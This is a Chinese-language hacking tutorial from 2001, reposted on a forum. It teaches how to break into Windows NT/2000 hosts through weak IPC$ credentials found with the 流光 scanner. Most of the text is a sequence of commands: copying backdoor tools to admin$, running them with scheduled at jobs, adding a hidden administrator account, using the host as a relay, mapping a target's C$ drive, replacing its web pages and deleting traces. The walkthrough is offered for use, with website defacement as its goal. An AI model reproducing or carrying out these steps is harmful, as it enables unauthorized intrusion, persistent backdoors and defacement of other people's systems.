|
|
简单入侵NT主机
我先说一说入侵的过程,入侵用到的工具只是流光2001,系统是WIN2000。
1、先找台肉机,用流光进行NT/98扫描,对扫到的主机进行IPC登录,即使是简单测试,都可以试出很多主机的用户和密码。(OK,现在找到一个用户名与密码相同的肉机,当然是要有admin权限的用户了)
2、回到系统,在“命令提示符”下,IPC登录:
net use \\ip\ipc$ "password" /user:username
把流光TOOLS目录中的SRV.EXE 与 NTLM.EXE拷贝到肉机
copy srv.exe \\ip\admin$\system32
copy ntlm.exe \\ip\admin$\system32
net time \\ip #查看肉机当前时间
at \\ip time srv.exe #用AT命令执行SRV.EXE,这里的时间要比查看的时间晚两分钟左右,可以用AT \\IP 来查看指定执行命令的状况
等几分钟,命令执行完成,telnet xxx.xxx.xxx.xxx 99 登录成功。要做如下事:
c:\net user newboys 12345 /add #添加名叫newboys的用户,密码为12345
c:\net localgroup administrators newboys /add #把newboys用户放入管理员组中(成超级用户了^&^)
c:\ntlm #运行刚拷到肉机上的ntlm.exe,其作用是把telnet变为明文传输。(流光2001中是这么说的)
运行完NTLM.EXE 后,用EXIT 断开连接。
回到命令提示符下: 利用TOOLS目录中的NETSVC.EXE中断肉机TELNET服务
netsvc \\ip telnet /stop #关闭指定ip的telnet服务
netsvc \\ip telnet /start #打开指定ip的telnet服务
其实如果指定ip以前未开telnet服务直接打"netsvc \\ip telnet /start"就行了。
现在登录:
telnet \\ip 登录到了肉机,在这种状态下,再利用IPC登录,登录目标主机.(目标机的用户名和密码同样是用流光获得的,当然也是admin权限的用户啦)
net use \\ip\ipc$ "password"/user:username
net use x: \\ip\c$ 将他的c盘映射到本地的X盘,(因为一般默认目录在c盘下面,默认存放网页的路径是
c:\inetpub\wwwroot)
把你事先准备好的网页拷到其web目录中,整个黑网站的过程就此算完成了一大半了。最后是清理战场,把拷到肉机上的东东全删了。exit后黑网站的全过程结束。
小结:以上的文章教了你用黑一个网站(由于网站管理员错误造成的)和如何做一个跳板。以后你可以用
newboys这个账号登陆到那个肉机了(这可是你自己的跳板呀)。请不要拿国内主机进行试验。
妖狐安全网 15safety.com 版权所有 © 2001
所有文章版权属于原作者所有,转载请与原作者联系并注明出处-妖狐安全资讯网
|
|
闽公网安备35020302032614号 )
IP卡
狗仔卡
发表于 2001-7-7 16:00:53
提升卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡